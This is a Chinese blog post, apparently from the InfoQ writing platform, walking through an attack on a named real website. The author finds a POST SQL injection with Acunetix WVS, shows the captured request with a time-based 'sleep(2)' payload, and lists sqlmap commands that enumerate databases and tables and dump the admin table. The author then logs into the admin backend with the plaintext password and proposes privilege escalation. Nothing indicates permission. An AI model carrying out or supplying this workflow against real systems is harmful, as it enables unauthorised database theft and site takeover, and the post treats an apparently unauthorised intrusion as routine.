写点什么

利用 wvs 扫描网站发现一个页面,暴露了错误信息

作者:喀拉峻
  • 2022 年 2 月 28 日
  • 本文字数:689 字

    阅读完需:约 2 分钟

今晚给一个网站做了一次入侵检测,首先进行信息刺探后,发现这个站有注入策略,所有页面都没法通过常规的注入,利用 wvs 扫描网站发现一个页面。


这个页面直接暴露出了错误信息,看了一下 url 没有参数却爆出了错误,感觉 post 能注入,于是抓包修改 header 分析了一下

RequestPOST /medresult.php HTTP/1.1Content-Length: 28Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestCookie: PHPSESSID=2ah1ottpdkcj0jgip9lgl54891Host: www.zgyijing.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)Acunetix-Scanning-agreement: Third Party Scanning PROHIBITEDAcunetix-User-agreement: http://www.acunetix.com/wvs/disc.htmAccept: */*
lm=5 and sleep(2)
复制代码

发现这个页面存在 SQL 注入漏洞,还是 POST 类型的注入漏洞,防了 GET 注入但是没有防御 POST 注入,于是乎。。。跑一下 sqlmap

格式为:sqlmap -u http://www.xxxxx.com --data "lm=1"


发现确实是存在注入的,于是乎。。。 把表爆出来找关键的表

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" --dbs


发现一个关键信息的表,这个站用的库就是 vps051,于是乎把 vps051 这个哭的表爆出来

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" -D vps051 --tables


英语好点的同学应该猜测到管理员的表应该是 master,爆出管理的表


密码竟然是明文的,省去了破解的功夫,这下得到了管理的密码,登录网站后台


接下来就可以考虑提权了。。

用户头像

喀拉峻

关注

左手Java右手Python,中间纹个C++ 2021.06.26 加入

还未添加个人简介

评论

发布
暂无评论
利用wvs扫描网站发现一个页面,暴露了错误信息_网络安全_喀拉峻_InfoQ写作平台